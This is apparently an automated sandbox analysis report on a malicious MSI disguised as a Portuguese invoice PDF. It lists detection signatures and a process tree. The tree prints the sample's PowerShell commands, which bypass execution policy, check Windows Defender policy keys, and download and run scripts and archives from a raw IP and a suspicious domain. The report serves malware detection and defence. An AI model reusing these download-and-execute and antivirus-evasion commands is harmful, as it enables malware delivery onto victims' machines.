Edit tour
Windows
Analysis Report
Fatura931Pendente956.pdf761.msi
Overview
General Information
| Sample name: | Fatura931Pendente956.pdf761.msi |
| Analysis ID: | 1562889 |
| MD5: | bff69c9caad1762cf45331e6ecea1049 |
| SHA1: | 593a8d261a31c08e73be5d119caa3a27e85f4d6b |
| SHA256: | 949ac0a131df40fa1c35d211934acd66fca038c027bc074ae12f7806e3b814cd |
| Tags: | msiuser-abuse_ch |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected MalDoc
Yara detected Powershell download and execute
AI detected suspicious URL
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates files in the system32 config directory
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Suspicious MsiExec Embedding Parent
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
msiexec.exe (PID: 3288 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\Desktop\ Fatura931P endente956 .pdf761.ms i" MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 3720 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 7068 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 7499E4E 7F1DA1FA24 C606FAD5E4 A5918 MD5: 9D09DC1EDA745A5F87553048E57620CF) 
powershell.exe (PID: 6344 cmdline: -NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss82 F.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 6256 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7488 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss38 1D.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
chrome.exe (PID: 7608 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" http s://yqvn-6 391824-met aflux-xytr mnwl-246.1 mp3.org/fa tura/fatur a.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7872 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2172 --fi eld-trial- handle=206 0,i,128007 5975922006 8023,38784 2789219300 1850,26214 4 /prefetc h:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - powershell.exe (PID: 4856 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss49 57.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6300 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss66 78.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1216 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5672 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss89 08.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7112 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1020 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pssA4 C2.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6680 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1236 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pssD5 4C.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3408 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss15 66.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6224 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss63 D8.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5624 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6052 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pssBA 2A.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 884 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1360 cmdline:
-NoProfile -Executio nPolicy By pass -File "C:\Users \user\AppD ata\Local\ Temp\pss2A 2E.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7312 cmdline:
Powershell .exe -Wind owStyle Hi dden -Exec utionPolic y Bypass - File C:\te mp\ShowUpd ateScreen. ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
svchost.exe (PID: 7736 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 7228 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -Command & { if (( Get-MpPref erence).Di sableRealt imeMonitor ing -eq $f alse) { Start-Sc heduledTas k -TaskNam e 'ATD' } } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7188 cmdline:
Powershell .exe -Wind owStyle Hi dden -Exec utionPolic y Bypass - File C:\te mp\ShowUpd ateScreen. ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 5900 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\swfob4 yn.cmdline " MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 5444 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESA037.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 9B11AECFE9 254054A143 3CAC9323B2 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- powershell.exe (PID: 6468 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -E xecutionPo licy Bypas s -NoProfi le -Comman d "& { $ folderPath = 'C:\Loc alNow' $ fileUrl = 'https://q sif-943275 1-neuralli nk-bwlprty x-099.comp utador-har dware.net/ simples/ro sa.png' $downloade dFile = Jo in-Path $f olderPath 'rosa.png' $zipFil e = Join-P ath $folde rPath 'ros a.zip' $ extractedF older = Jo in-Path $f olderPath 'Extracted ' whil e ($true) { Star t-Sleep -S econds 60 if (!(Test-P ath -Path $folderPat h)) { Write-Ou tput 'Past a LocalNow n o encon trada. Agu ardando no va verific a o.' continue } # Ver ifica se e xiste algu m arquivo DLL na pas ta $dl lFiles = G et-ChildIt em -Path $ folderPath -Filter * .dll -Recu rse -Error Action Sil entlyConti nue if ($dll Files -and $dllFiles .Count -gt 0) { Write-Ou tput 'Arqu ivo DLL en contrado: $($dllFile s[0].Name) ' br eak # Sai do loop wh ile } Wr ite-Output 'Arquivo DLL n o en contrado. Reiniciand o o proces so.' # Limpa a pasta a ntes de no vo downloa d try { Ge t-ChildIte m -Path $f olderPath -Recurse | Remove-It em -Force -Recurse - ErrorActio n Stop # Download e extra o Invo ke-WebRequ est -Uri $ fileUrl -O utFile $do wnloadedFi le -ErrorA ction Stop Ren ame-Item - Path $down loadedFile -NewName $zipFile - ErrorActio n Stop Expand- Archive -P ath $zipFi le -Destin ationPath $extracted Folder -Fo rce -Error Action Sto p Write- Output 'Pr ocesso de extra o co mpletado c om sucesso .' } catch { Wri te-Output 'Erro dura nte o proc esso: $($_ .Exception .Message)' Sta rt-Sleep - Seconds 30 # Espera antes de t entar nova mente } } exit # Enc erra o scr ipt ap s s air do loo p }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1144 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5376 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -WindowSty le Hidden -File "C:\ Users\user \AppData\L ocal\Temp\ Executar01 aa.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7380 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -E xecutionPo licy Bypas s -NoProfi le -Comman d "& { $ folderPath = 'C:\Loc alNow' $ loopComple ted = $fal se for ( $i = 0; $i -lt 3; $i ++) { Start-Slee p -Seconds 60 # Verifica a s chaves d o Registro $keyP ath = 'HKL M:\SOFTWAR E\Policies \Microsoft \Windows D efender' $disabl eAntiSpywa re = (Get- ItemProper ty -Path $ keyPath -N ame 'Disab leAntiSpyw are' -Erro rAction Si lentlyCont inue).Disa bleAntiSpy ware -eq 1 $disa bleAntiVir us = (Get- ItemProper ty -Path $ keyPath -N ame 'Disab leAntiViru s' -ErrorA ction Sile ntlyContin ue).Disabl eAntiVirus -eq 1 # Se ambas as c haves exis tirem com valor 1, s ai do loop e define que o loop completou if ($ disableAnt iSpyware - eq 1 -and $disableAn tiVirus -e q 1) { $loopCo mpleted = $true break } } # Se o loo p tiver si do interro mpido, ver ifica se a pasta j e xiste e a cria se ne cess rio if ($loop Completed -and !(Tes t-Path -Pa th $folder Path)) { New-Ite m -ItemTyp e Director y -Path $f olderPath -Force Write-Out put "Pasta C:\LocalN ow criada com sucess o ap s o l oop comple tar." } }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6704 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -Command " if (-not ( Test-Path 'C:\temp') ) { New- Item -Item Type Direc tory -Path 'C:\temp' -Force | Out-Null } try { I nvoke-WebR equest -Ur i 'http:// 192.124.21 6.14/vd/si s/DownSist em.ps1' -O utFile 'C: \temp\Down Sistem.ps1 ' -UseBasi cParsing Write-Out put 'Arqui vo DownSis tem.ps1 ba ixado com sucesso em C:\temp\D ownSistem. ps1' } cat ch { Wri te-Output 'Erro ao b aixar o ar quivo Down Sistem.ps1 : ' exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6736 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -File "C:\ temp\DownS istem.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7364 cmdline:
PowerShell .exe -NoPr ofile -Exe cutionPoli cy Bypass -File C:\t emp\sistem a.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||